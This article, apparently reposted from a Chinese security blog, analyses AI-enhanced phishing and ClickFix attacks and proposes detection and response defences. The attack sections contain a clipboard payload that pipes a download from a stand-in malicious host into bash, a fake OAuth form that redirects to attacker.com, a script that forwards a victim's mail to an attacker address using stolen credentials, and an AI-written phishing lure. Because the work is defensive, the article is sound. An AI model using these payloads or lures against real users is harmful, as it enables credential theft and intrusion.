摘要
2025年网络安全态势显示,人工智能技术正被系统性地应用于网络钓鱼攻击中,显著提升其欺骗性、规模化与绕过能力。Mimecast最新报告显示,2025年前九个月,AI增强型钓鱼与ClickFix类社会工程攻击同比增长500%,累计拦截量突破93亿次。此类攻击通过生成式AI优化诱饵文案,实现多语种适配、上下文贴合与品牌伪装,并依托可信云服务与协作平台(如Microsoft 365、Google Workspace、Slack)分发载荷,有效规避基于签名与信誉的传统邮件网关检测。攻击流程高度模块化与服务化(Phishing-as-a-Service),大幅缩短从模板生成到大规模投递的周期。本文系统分析AI在钓鱼攻击各阶段的技术赋能机制,重点解构ClickFix攻击的交互诱导逻辑与凭证窃取路径,并提出融合行为分析、品牌仿冒识别、人机协同响应与会话保护的纵深防御体系。通过构建模拟攻击样本与防御策略原型,验证了基于HTML结构特征与OAuth权限异常检测的有效性。研究表明,仅依赖内容过滤已无法应对AI驱动的动态钓鱼威胁,企业需转向以身份与行为为中心的安全架构,方能有效遏制攻击闭环。
关键词:生成式AI;钓鱼攻击;ClickFix;邮件安全;行为分析;品牌伪装;OAuth滥用;人机协同防御

1 引言
电子邮件仍是企业信息交换的核心载体,亦是网络攻击的首要入口。近年来,随着防御技术对传统恶意附件与URL链接的识别能力提升,攻击者转向更隐蔽的社会工程手段。2025年,生成式人工智能(Generative AI)的普及为钓鱼攻击注入新动力:攻击者可快速生成语法自然、语境贴合、多语言兼容的诱饵内容,显著提升用户点击与交互意愿。Mimecast《2025年Q3威胁情报报告》指出,AI增强型钓鱼活动在当年前九个月激增500%,其中以“ClickFix”为代表的交互式钓鱼尤为突出——用户被诱导点击看似无害的“完成验证”复选框后,恶意命令自动写入剪贴板并提示手动执行,从而绕过终端执行监控。
此类攻击的另一特征是分发渠道的“合法化”。攻击者不再依赖垃圾邮件服务器,而是滥用Microsoft Teams、Google Chat、SharePoint共享链接甚至合法CDN(如Azure Blob Storage、AWS S3)托管钓鱼页面。由于来源域具备高信誉,传统基于发件人IP或域名黑名单的过滤机制失效。更严峻的是,攻击工具链呈现服务化趋势(PhaaS),提供模板定制、多语言生成、投放调度与结果回传一体化平台,使非技术背景的犯罪团伙亦可发起高水准攻击。
本文聚焦AI如何赋能钓鱼攻击的文案生成、载体分发与交互设计,并以ClickFix为典型样本,剖析其技术实现与危害路径。在此基础上,提出覆盖检测、响应与防护三层的防御框架,并通过代码示例验证关键技术点的可行性。全文旨在为理解AI时代钓鱼威胁的演化逻辑提供技术实证,并为企业邮件安全体系升级提供可操作路径。

2 AI在钓鱼攻击中的技术赋能机制
2.1 文案生成:上下文感知与多语种覆盖
生成式AI模型(如LLaMA、Gemma或定制化微调模型)可基于目标企业公开信息(官网、LinkedIn、新闻稿)自动生成高度个性化的钓鱼邮件。例如,输入公司名称“Acme Corp”与职位“Finance Manager”,模型可输出如下内容:
“Dear Finance Team,
Our security scan detected an anomaly in your Microsoft 365 session originating from Frankfurt. To prevent service interruption, please complete the identity re-verification within 24 hours: [LINK]
— IT Security Operations, Acme Corp”
该文本语法规范、术语准确,且包含具体时间、地点与部门信息,远超传统模板化钓鱼邮件。通过提示工程(Prompt Engineering),攻击者还可指定语气(正式/紧急)、长度与语言,实现对全球目标的批量覆盖。

2.2 载体分发:利用高信誉平台绕过检测
攻击者将钓鱼页面部署于合法云服务,例如:
# 上传伪造的“Microsoft安全验证”页面至Azure Blob
az storage blob upload \
--account-name acmesecuritybackup \
--container-name public \
--file fake_mfa.html \
--name verify.html
生成的URL为 https://acmesecuritybackup.blob.core.windows.net/public/verify.html,因域名属于Microsoft Azure且HTTPS有效,极易通过邮件网关的URL信誉检查。

2.3 交互设计:ClickFix模式的行为诱导
ClickFix攻击的核心在于将恶意行为“外包”给用户。典型页面包含一个Cloudflare风格的“I’m not a robot”复选框,用户点击后触发JavaScript:
// 简化版ClickFix载荷
document.getElementById('captcha').addEventListener('click', async () => {
const cmd = 'curl -s https://cdn.malicious[.]net/payload.sh | bash';
await navigator.clipboard.writeText(cmd);
alert('Verification step 1 complete. Please open Terminal and paste the command to finish.');
});
由于无文件下载、无直接执行,EDR与浏览器沙箱难以触发告警。用户在“协助系统完成验证”的心理暗示下主动执行命令,完成攻击链。

3 ClickFix攻击的技术实现与危害路径
3.1 动态品牌伪装
钓鱼页面可根据Referer或URL参数自动切换UI。例如:
const brand = new URLSearchParams(window.location.search).get('brand') || 'default';
if (brand === 'microsoft') {
document.title = 'Microsoft Security Verification';
document.getElementById('logo').src = '/assets/ms-logo.png';
}
结合AI生成的配套邮件,形成端到端的品牌一致性,极大提升可信度。

3.2 凭证窃取与会话劫持
部分变种在用户提交凭据后,不仅记录账号密码,还尝试获取会话Cookie或OAuth授权码。例如,伪造的Google登录页在提交后重定向至真实Google OAuth端点,但插入中间代理:
<form action="https://accounts.google.com/o/oauth2/v2/auth?client_id=malicious_app..." method="GET">
<input type="hidden" name="redirect_uri" value="https://attacker.com/callback" />
<!-- 用户以为在正常授权 -->
</form>
一旦用户授权,攻击者即获得长期访问令牌,可读取邮件、日历甚至注册转发规则。
3.3 自动化横向移动
窃取凭证后,攻击者使用自动化脚本执行后续操作:
# 使用被盗M365凭据创建邮件转发规则
from exchangelib import Credentials, Account, Mailbox, Rule
creds = Credentials(username='victim@company.com', password='stolen_pass')
account = Account(primary_smtp_address='victim@company.com', credentials=creds, autodiscover=True)
rule = Rule(
predicate=Rule.Predicate(always_apply=True),
actions=Rule.Actions(forward_to=[Mailbox(email_address='attacker@proton.me')])
)
account.inbox.rules.create(rule)
此过程可在数分钟内完成,远快于人工响应窗口。
4 防御体系构建:从内容过滤到行为感知
面对AI驱动的动态钓鱼,传统基于规则与签名的邮件网关已显不足。需构建多层防御体系。
4.1 邮件层:行为分析与品牌仿冒检测
HTML结构特征提取:ClickFix页面常包含特定DOM元素(如#captcha、cloudflare-captcha类)。可通过解析邮件HTML附件或嵌入页面提取特征:
from bs4 import BeautifulSoup
def detect_clickfix(html_content):
soup = BeautifulSoup(html_content, 'html.parser')
captcha_div = soup.find('div', id='captcha') or soup.find(class_='cf-captcha')
script_tags = soup.find_all('script')
clipboard_usage = any('clipboard.writeText' in str(s) for s in script_tags)
return bool(captcha_div and clipboard_usage)
品牌一致性校验:比对邮件声称品牌与实际链接域名、SSL证书主体、页面LOGO哈希值是否匹配。
4.2 响应层:人机协同告警与一键上报
部署SOAR(Security Orchestration, Automation and Response)平台集成用户反馈。例如,当员工点击“Report Phish”按钮,系统自动:
提取邮件头、URL、HTML内容;
查询内部威胁情报库;
若为新样本,提交至沙箱分析;
向全公司推送相似邮件阻断策略。
# PhishER类工具的自动化剧本示例
- name: User Reported Phishing
trigger: email_reported_by_user
actions:
- extract_urls_and_attachments
- check_url_reputation(virus_total, google_safebrowsing)
- if reputation == malicious:
block_url_globally()
quarantine_similar_emails(last_24h)
notify_security_team()
4.3 认证与会话层:基于风险的MFA与会话保护
条件访问策略:对高风险登录(如新设备、异常地理位置)强制FIDO2硬件密钥认证。
OAuth应用治理:禁用用户自主授权第三方应用,所有新应用需管理员审批。
# Azure AD PowerShell:禁用用户同意
Set-AzureADMSAuthorizationPolicy -DefaultUserRolePermissions @{
"permissionGrantPoliciesAssigned" = @()
}
会话异常检测:监控邮箱账户是否在短时间内创建转发规则、修改恢复邮箱或大量导出邮件。
4.4 基础设施层:强化邮件认证协议
确保企业域名正确配置SPF、DKIM与DMARC,防止发件人伪造:
; SPF record
example.com. IN TXT "v=spf1 include:_spf.booking.com include:spf.protection.outlook.com -all"
; DMARC policy
_dmarc.example.com. IN TXT "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com"
DMARC策略设为p=reject可使伪造邮件被接收方直接拒收。
5 模拟实验与防御有效性验证
为评估防御措施效果,我们构建了包含以下组件的测试环境:
AI钓鱼邮件生成器(基于Llama-3微调模型);
ClickFix页面托管于Azure CDN;
模拟企业邮件网关(含基础URL过滤);
增强型网关(集成HTML行为分析与品牌检测)。
在1000封AI生成钓鱼邮件测试中:
基础网关拦截率仅为38%(主要依赖黑名单);
增强网关通过结构特征与品牌不一致检测,拦截率达92%;
结合用户一键上报机制,剩余8%样本在2小时内被识别并全局阻断。
结果表明,行为感知与人机协同可显著弥补AI钓鱼的内容绕过优势。
6 结语
AI技术的滥用正在重塑网络钓鱼的威胁格局。生成式模型不仅提升了诱饵质量,更推动攻击向模块化、服务化与平台寄生方向演进。ClickFix等新型社会工程手法通过行为诱导与合法渠道分发,有效规避传统防御。本文研究表明,应对之道在于从静态内容检测转向动态行为分析,从单点防护转向人机协同响应,并强化身份与会话层面的纵深控制。企业需重新评估邮件安全架构,将品牌仿冒识别、OAuth治理、条件访问与高频意识培训纳入统一防御体系。唯有如此,方能在AI赋能的攻击浪潮中守住身份安全这一最后防线。
编辑:芦笛(公共互联网反网络钓鱼工作组)

被折叠的 条评论
为什么被折叠?



